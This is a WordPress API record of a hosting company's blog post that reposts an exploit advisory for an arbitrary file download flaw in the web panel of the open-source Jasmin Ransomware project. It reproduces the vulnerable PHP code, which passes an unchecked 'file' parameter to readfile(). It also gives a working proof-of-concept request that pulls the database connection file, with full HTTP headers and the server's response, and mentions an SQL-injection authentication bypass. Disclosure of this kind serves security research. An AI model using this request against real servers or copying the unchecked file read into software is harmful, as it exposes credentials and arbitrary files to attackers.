{"id":62573,"date":"2025-04-08T14:39:34","date_gmt":"2025-04-08T11:09:34","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/jasmin-ransomware-arbitrary-file-download-authenticated\/"},"modified":"2025-04-08T14:39:34","modified_gmt":"2025-04-08T11:09:34","slug":"jasmin-ransomware-arbitrary-file-download-authenticated","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jasmin-ransomware-arbitrary-file-download-authenticated\/","title":{"rendered":"Jasmin Ransomware &#8211; Arbitrary File Download (Authenticated)"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-txt\" style=\"white-space: pre-wrap;\"># Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download&#13;\n# Google Dork: N\/A&#13;\n# Date: 22-03-2025&#13;\n# Exploit Author: bRpsd cy[at]live.no&#13;\n# Vendor Homepage: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware&#13;\n# Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware&#13;\n# Version: N\/A&#13;\n# Tested on: MacOS local xampp&#13;\n&#13;\n&#13;\nAuthentication can be easily bypassed due to SQL Injection as mentioned in:&#13;\nhttps:\/\/www.exploit-db.com\/exploits\/52091&#13;\n&#13;\n&#13;\n&#13;\nVulnerable file:Web Panel\/download_file.php&#13;\nVulnerable parameter:file&#13;\nVulnerable code:&#13;\n<?php session_start();\nif(!isset($_SESSION[&#039;username&#039;]) ){\n\theader(&quot;Location: login.php&quot;);\n}\n$file=$_GET[&#039;file&#039;];\nif(!empty($file)){\n    \/\/ Define headers\n    header(&quot;Cache-Control: public&quot;);\n    header(&quot;Content-Description: File Transfer&quot;);\n    header(&quot;Content-Disposition: attachment; filename=$file&quot;);\n    header(&quot;Content-Type: text\/encoded&quot;);\n    header(&quot;Content-Transfer-Encoding: binary&quot;);\n    \n    \/\/ Read the file\n   readfile($file);\n    exit;\n}else{\n    echo &#039;The file does not exist.&#039;;\n}\n??>&#13;\n&#13;\n&#13;\nProof of concept:&#13;\n&#13;\nhttp:\/\/localhost\/Jasmin-Ransomware\/Web Panel\/download_file.php?file=database\/db_conection.php&#13;\nHost: localhost&#13;\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko\/20100101 Firefox\/136.0&#13;\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8&#13;\nAccept-Language: en-US,en;q=0.5&#13;\nAccept-Encoding: gzip, deflate, br, zstd&#13;\nConnection: keep-alive&#13;\nCookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c&#13;\nUpgrade-Insecure-Requests: 1&#13;\nSec-Fetch-Dest: document&#13;\nSec-Fetch-Mode: navigate&#13;\nSec-Fetch-Site: none&#13;\nSec-Fetch-User: ?1&#13;\n&#13;\nGET: HTTP\/1.1 200 OK&#13;\nDate: Sat, 22 Mar 2025 09:42:09 GMT&#13;\nServer: Apache\/2.4.53 (Unix) OpenSSL\/1.1.1o PHP\/7.4.29 mod_perl\/2.0.12 Perl\/v5.34.1&#13;\nX-Powered-By: PHP\/7.4.29&#13;\nExpires: Thu, 19 Nov 1981 08:52:00 GMT&#13;\nCache-Control: public&#13;\nPragma: no-cache&#13;\nContent-Description: File Transfer&#13;\nContent-Disposition: attachment; filename=database\/db_conection.php&#13;\nContent-Transfer-Encoding: binary&#13;\nContent-Length: 95&#13;\nKeep-Alive: timeout=5, max=100&#13;\nConnection: Keep-Alive&#13;\nContent-Type: text\/encoded;charset=UTF-8\n            <\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net]\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Jasmin Ransomware &#8211; (Authenticated) Arbitrary File Download&#13; # Google Dork: N\/A&#13; # Date: 22-03-2025&#13; # Exploit Author: bRpsd cy[at]live.no&#13; # Vendor Homepage: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware&#13; # Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware&#13; # Version: N\/A&#13; # Tested on: MacOS local xampp&#13; &#13; &#13; Authentication can be easily bypassed due to SQL Injection as mentioned in:&#13; https:\/\/www.exploit-db.com\/exploits\/52091&#13; &#13; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62573","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62573"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62573\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}